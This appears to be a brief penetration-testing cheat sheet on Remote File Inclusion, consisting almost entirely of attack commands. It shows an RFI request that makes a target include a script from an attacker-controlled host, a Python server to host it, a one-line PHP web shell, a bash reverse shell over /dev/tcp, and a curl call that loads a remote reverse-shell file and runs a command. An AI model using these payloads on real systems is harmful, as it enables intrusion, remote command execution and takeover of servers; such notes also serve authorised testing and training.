RFI
1) Example vulnerable app
http://<target_url>/file.php?recurse=http://<attacker_ip>/malicious.php2) Reverse shell
python3 -m http.server 80# Option 1: Reverse Shell via PHP
<?php system($_GET['cmd']); ?>
# Option 2: Reverse Shell via Bash
bash -c "sh -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1"curl "http://<TARGET>/index.php?page=http://<ATTACKER_IP>/revshell.php&cmd=ls"Last updated